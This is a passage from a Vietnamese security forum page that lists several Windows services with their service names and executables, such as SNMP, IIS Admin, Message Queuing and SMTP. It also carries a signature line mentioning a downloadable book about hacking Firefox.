83. SNMP Service--------------- SMNP ------------- snmp.exe
84. RIP Listener----------------lprip --------------svchost.exe
85. FTP Publishing Service------------MSFTPSVC -------------inetinfo.exe
86. IIS Admin-------------IISADMIN ----------------inetinfo.exe
87. Message Queuing-------------MSMQ -------------mqsvc.exe
88. Message Queuing Triggers--------------- MSMQTriggers -------------mqtgsvc.exe
89. MS Software Shadow Copy Provider---------------SwPrv -----------dllhost.exe
90. Simple Mail Transport Protocol (SMTP)--------------- SMTPSVC --------------inetinfo.exe
------------------------------------------------------------------------------------------------------------------

Một cuốn sách rất hay về hack firefox: download

[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|